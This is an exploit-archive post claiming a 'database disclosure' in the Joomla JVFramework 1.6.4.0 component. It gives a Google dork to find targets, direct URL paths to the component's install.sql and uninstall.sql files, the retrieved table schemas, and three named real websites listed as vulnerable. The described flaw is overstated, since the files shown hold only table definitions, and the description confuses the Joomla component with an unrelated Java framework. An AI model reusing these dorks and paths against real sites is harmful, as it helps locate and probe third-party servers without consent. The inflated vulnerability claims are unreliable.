KingSkrupellos

Joomla JVFramework Components 1.6.4.0 Database Disclosure

Jan 18th, 2019
####################################################################

# Exploit Title : Joomla JVFramework Components 1.6.4.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepages : joomlavi.com ~ jvframework.com
# Software Download Link : bestofjoomla.com/component/option,com_mtree/task,viewlink/link_id,2143/Itemid,95/
# Software Information Link : sourceforge.net/projects/jvframework/
# Software Affected Version : 1.6.4.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_jvframework/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

####################################################################

# Description :
**************
*JV Framework brings you the power to handle your website in the most elegant way.
*JV Framework has got the first-time deployed Drag and Drop feature.
*JVFramework is an application framework for Java. Its main goal is to avoid code duplication
(such as metadata, UI programming, etc.) related to the construction of a
web application, providing a declarative language for business tier programming.

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_jvframework/installation/install.sql
/administrator/components/com_jvframework/installation/uninstall.sql

####################################################################

# Information : [ uninstall.sql ] =>
************
-- --------------------------------------------------------
DROP TABLE IF EXISTS `#__jv_themes`;
-- --------------------------------------------------------
DROP TABLE IF EXISTS `#__jv_theme_assign`;

*******************************************

# Information : [ install.sql ] =>

-- -------------------------------------------------------------

CREATE TABLE IF NOT EXISTS `#__jv_themes` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`theme` varchar(50) NOT NULL,
`home` tinyint(1) NOT NULL,
`params` varchar(10240) NOT NULL,
`published` tinyint(1) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- -------------------------------------------------------------

CREATE TABLE IF NOT EXISTS `#__jv_theme_assign` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`menuid` int(11) NOT NULL,
`themeid` int(11) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

####################################################################

# Example Vulnerable Sites :
*************************

[+] legacyshare.org/administrator/components/com_jvframework/installation/install.sql

[+] mbconsulting.al/administrator/components/com_jvframework/installation/uninstall.sql

[+] lilpaws-malteserescue.org/main/administrator/components/com_jvframework/installation/install.sql

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################